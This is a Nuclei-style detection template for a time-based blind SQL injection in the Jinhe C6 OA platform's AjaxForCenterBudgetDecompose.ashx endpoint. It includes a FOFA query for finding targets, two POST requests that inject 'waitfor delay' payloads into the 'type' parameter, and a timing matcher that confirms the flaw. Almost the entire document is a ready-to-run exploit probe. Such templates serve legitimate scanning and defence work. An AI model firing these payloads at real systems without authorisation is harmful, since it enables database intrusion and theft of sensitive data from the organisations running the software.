id: jinhewanluo-c6-ajaxforcenterbudgetdecompose_ashx-sql-time

info:
  name: 金和C6协同管理平台 /c6/JHSoft.Web.CostControl/Decompose/AjaxForCenterBudgetDecompose.ashx SQL延时注入
  author: HuanXiong
  severity: high
  description: |-
    fofa: app="金和网络-金和OA"
    金和C6协同管理平台 /c6/JHSoft.Web.CostControl/Decompose/AjaxForCenterBudgetDecompose.ashx 接口存在SQL延时注入漏洞，攻击者可利用该漏洞进行时间盲注，获取数据库敏感信息。
  reference:
    - 
  tags: sql-time, jinhewanluo, jinhoaoa

http:
  - raw:
      - |-
        POST /c6/JHSoft.Web.CostControl/Decompose/AjaxForCenterBudgetDecompose.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36

        strType=getBudgetTime&strDeptId=1&strYear=2012&type=1'waitfor delay '0:0:4'--&TimeType=1

      - |-
        POST /c6/JHSoft.Web.CostControl/Decompose/AjaxForCenterBudgetDecompose.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36

        strType=getBudgetTime&strDeptId=1&strYear=2012&type=1'waitfor delay '0:0:8'--&TimeType=1

    matchers:
      - type: dsl
        name: SQL延时注入
        dsl:
          - "status_code==200 && duration_1>=4 && duration_1<=5 && duration_2>=8 && duration_2<=9"